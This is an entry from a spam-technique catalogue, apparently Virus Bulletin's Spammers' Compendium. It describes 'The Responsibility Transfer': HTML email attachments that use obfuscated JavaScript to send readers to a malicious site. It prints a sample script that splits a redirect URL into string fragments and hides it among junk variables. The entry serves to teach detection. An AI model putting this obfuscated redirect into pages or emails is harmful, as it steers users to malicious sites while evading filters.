The Responsibility Transfer

UO!Responsibility!JavaScript

  31 August 2010

Description

Using an attached HTML document that contains almost the same page as the HTML-part of the email body, but uses obfuscated JavaScript to redirect the user to a malicious website. See also Script in the Middle.

Submitted by Sorin Mustaca.

Example

 <script>function r(){};fQ=false;d="";r.prototype = {p : function() { this.j='';var pN=54899;s=false;this.k="k";this.kH=22581;c='';l=64422;
document.location.href=String("htt"+"p:/"+"/tr"+"ace"+"boo"+"k.u"+"s/1"+".htOnc".substr(0,3)+"ml");
this.g=59634;var o=false;z='';f="f";e="";y=22487;}};x="";
var gK=false;var zA=new r(); pU='';this.u="u";zA.p();var lK=false;
</script>

Entries

Hypertextus Interruptus

Spammers compendium entry - Hypertextus Interruptus

MIME is Money

Spammers compendium entry - MIME is Money

Script Writer

Spammers compendium entry - Script Writer

Slice and Dice

Spammers compendium entry - Slice and Dice

L O S T i n S P A C E

Spammers compendium entry - L O S T i n S P A C E

We have placed cookies on your device in order to improve the functionality of this site, as outlined in our cookies policy. However, you may delete and block all cookies from this site and your use of the site will be unaffected. By continuing to browse this site, you are agreeing to Virus Bulletin's use of data as outlined in our privacy policy.